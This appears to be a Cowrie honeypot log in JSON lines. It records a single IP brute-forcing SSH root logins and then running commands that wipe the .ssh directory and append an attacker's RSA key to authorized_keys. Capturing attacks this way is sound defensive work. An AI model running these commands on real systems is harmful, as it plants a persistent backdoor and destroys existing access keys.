{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:19.652299Z","src_ip":"212.227.235.229","session":"17b4ead51da7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59084,"dst_ip":"1.2.3.4","dst_port":22,"session":"50aa2428eade","protocol":"ssh","message":"New connection: 212.227.235.229:59084 (1.2.3.4:22) [session: 50aa2428eade]","sensor":"my-vps","timestamp":"2025-09-08T23:07:21.011329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:21.021991Z","src_ip":"212.227.235.229","session":"50aa2428eade"}
{"eventid":"cowrie.login.failed","username":"public","password":"111","message":"login attempt [public/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:07:21.067834Z","src_ip":"212.227.235.229","session":"17b4ead51da7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:21.269060Z","src_ip":"212.227.235.229","session":"50aa2428eade"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T23:07:22.272416Z","src_ip":"212.227.235.229","session":"50aa2428eade"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:22.413098Z","src_ip":"212.227.235.229","session":"17b4ead51da7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:23.513004Z","src_ip":"212.227.235.229","session":"50aa2428eade"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46506,"dst_ip":"1.2.3.4","dst_port":22,"session":"644d7d29dac1","protocol":"ssh","message":"New connection: 212.227.235.229:46506 (1.2.3.4:22) [session: 644d7d29dac1]","sensor":"my-vps","timestamp":"2025-09-08T23:07:24.049878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:24.050858Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:24.151156Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789Ab","message":"login attempt [root/123456789Ab] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:07:24.605632Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:07:24.872849Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:07:24.873527Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:07:24.874460Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:24.979249Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:07:25.196980Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:07:25.197666Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:07:25.300620Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:25.301717Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46512,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a97ff4a42b7","protocol":"ssh","message":"New connection: 212.227.235.229:46512 (1.2.3.4:22) [session: 4a97ff4a42b7]","sensor":"my-vps","timestamp":"2025-09-08T23:07:25.400026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:25.400826Z","src_ip":"212.227.235.229","session":"4a97ff4a42b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:25.501191Z","src_ip":"212.227.235.229","session":"4a97ff4a42b7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:07:25.954157Z","src_ip":"212.227.235.229","session":"4a97ff4a42b7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:27.062114Z","src_ip":"212.227.235.229","session":"4a97ff4a42b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57064,"dst_ip":"1.2.3.4","dst_port":22,"session":"df3edb305c5f","protocol":"ssh","message":"New connection: 212.227.235.229:57064 (1.2.3.4:22) [session: df3edb305c5f]","sensor":"my-vps","timestamp":"2025-09-08T23:07:27.159592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:27.160272Z","src_ip":"212.227.235.229","session":"df3edb305c5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:27.258487Z","src_ip":"212.227.235.229","session":"df3edb305c5f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:07:27.691274Z","src_ip":"212.227.235.229","session":"df3edb305c5f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:27.796799Z","src_ip":"212.227.235.229","session":"644d7d29dac1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:27.797601Z","src_ip":"212.227.235.229","session":"df3edb305c5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42660,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecbcd9958680","protocol":"ssh","message":"New connection: 212.227.235.229:42660 (1.2.3.4:22) [session: ecbcd9958680]","sensor":"my-vps","timestamp":"2025-09-08T23:07:43.125050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:43.125788Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:43.434592Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.login.success","username":"root","password":"M@Ster","message":"login attempt [root/M@Ster] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:07:44.818368Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:07:45.475987Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:07:45.476671Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:07:45.477785Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:45.787903Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:07:46.768597Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:07:46.769298Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:07:47.077223Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:47.078121Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38086,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ebfaed19c11","protocol":"ssh","message":"New connection: 212.227.235.229:38086 (1.2.3.4:22) [session: 6ebfaed19c11]","sensor":"my-vps","timestamp":"2025-09-08T23:07:47.394465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:47.395213Z","src_ip":"212.227.235.229","session":"6ebfaed19c11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:47.712615Z","src_ip":"212.227.235.229","session":"6ebfaed19c11"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:07:49.030457Z","src_ip":"212.227.235.229","session":"6ebfaed19c11"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:50.351094Z","src_ip":"212.227.235.229","session":"6ebfaed19c11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38090,"dst_ip":"1.2.3.4","dst_port":22,"session":"2225e8875050","protocol":"ssh","message":"New connection: 212.227.235.229:38090 (1.2.3.4:22) [session: 2225e8875050]","sensor":"my-vps","timestamp":"2025-09-08T23:07:50.664310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:50.664981Z","src_ip":"212.227.235.229","session":"2225e8875050"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nist